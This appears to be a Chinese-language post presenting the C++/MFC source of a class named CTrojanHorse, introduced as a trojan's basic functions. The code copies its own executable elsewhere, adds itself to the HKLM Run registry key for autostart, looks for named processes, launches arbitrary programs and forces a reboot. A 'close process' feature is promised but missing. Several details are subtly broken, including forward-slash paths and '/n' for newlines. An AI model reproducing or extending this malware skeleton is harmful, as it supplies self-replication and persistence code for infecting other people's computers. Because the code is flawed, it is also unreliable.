TrojanHorse 基本功能

1,自我複製.2,修改註冊表自動運行.3,關閉進程.4,啓動程序.5,重啓關機功能.

 

#include <tlhelp32.h> class CTrojanHorse { public://add code public://add code CTrojanHorse(); ~CTrojanHorse(); protected://add code BOOL IfShell(CString BeKissPrcName); BOOL CopyFileaddr(CString m_CopyFile); void ShellFile(CString m_ShellFile); BOOL SetAutoRun(CString strPath); void ShutDown(); private://add code }; CTrojanHorse::CTrojanHorse() { //add code } CTrojanHorse::~CTrojanHorse() { //add code } BOOL CTrojanHorse::IfShell(CString BeKissPrcName)//判斷程序是否在運行 { CString str,a,prcnum; HANDLE SnapShot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); SHFILEINFO shSmall; PROCESSENTRY32 ProcessInfo;//聲明進程信息變量 ProcessInfo.dwSize=sizeof(ProcessInfo);//設置ProcessInfo的大小 //返回系統中第一個進程的信息 BOOL Status=Process32First(SnapShot,&ProcessInfo); int m_nProcess=0; int num=0; while(Status) { num++; m_nProcess++; ZeroMemory(&shSmall,sizeof(shSmall));//獲取進程文件信息 SHGetFileInfo(ProcessInfo.szExeFile,0,&shSmall, sizeof(shSmall),SHGFI_ICON|SHGFI_SMALLICON); str=ProcessInfo.szExeFile; if(str==BeKissPrcName) { AfxMessageBox("找到進程成功!"); return true; } //獲取下一個進程的信息 Status=Process32Next(SnapShot,&ProcessInfo); } AfxMessageBox("失敗!"); return false; } BOOL CTrojanHorse::CopyFileaddr(CString m_CopyFile) //複製文件 { char pBuf[MAX_PATH]; CString m_addr; GetCurrentDirectory(MAX_PATH,pBuf); //獲取程序的當前目錄 strcat(pBuf,"//"); strcat(pBuf,AfxGetApp()->m_pszExeName); strcat(pBuf,".exe"); m_addr=pBuf; if(CopyFile(m_addr,m_CopyFile,FALSE)) { AfxMessageBox("複製成功！"); return true; } return false; } void CTrojanHorse::ShellFile(CString m_ShellFile) //執行所要的程序 { ShellExecute(NULL,"open",m_ShellFile,NULL,NULL,SW_SHOWNORMAL); } BOOL CTrojanHorse::SetAutoRun(CString strPath) //修改註冊表 { CString str; HKEY hRegKey; BOOL bResult; str=_T("Software//Microsoft//Windows//CurrentVersion//Run"); if(RegOpenKey(HKEY_LOCAL_MACHINE, str, &hRegKey) != ERROR_SUCCESS) bResult=FALSE; else { _splitpath(strPath.GetBuffer(0),NULL,NULL,str.GetBufferSetLength(MAX_PATH+1),NULL); strPath.ReleaseBuffer(); str.ReleaseBuffer(); if(::RegSetValueEx( hRegKey, str, 0, REG_SZ, (CONST BYTE *)strPath.GetBuffer(0), strPath.GetLength() ) != ERROR_SUCCESS) bResult=FALSE; else bResult=TRUE; strPath.ReleaseBuffer(); } return bResult; } void CTrojanHorse::ShutDown() //重新啓動計算機 { if (IDYES == MessageBox("是否現在重新啓動計算機？", "註冊表提示", MB_YESNO)) { OSVERSIONINFO OsVerInfo; //保存系統版本信息的數據結構 OsVerInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFO); GetVersionEx(&OsVerInfo);//取得系統的版本信息 CString str1 = "", str2 = ""; str1.Format("你的系統信息/n版本爲：%d.%d/n", OsVerInfo.dwMajorVersion, OsVerInfo.dwMinorVersion); str2.Format("型號：%d/n", OsVerInfo.dwBuildNumber); str1 += str2; AfxMessageBox(str1); if(OsVerInfo.dwPlatformId == VER_PLATFORM_WIN32_NT) ExitWindowsEx(EWX_REBOOT | EWX_SHUTDOWN, 0); //重新啓動計算機 } }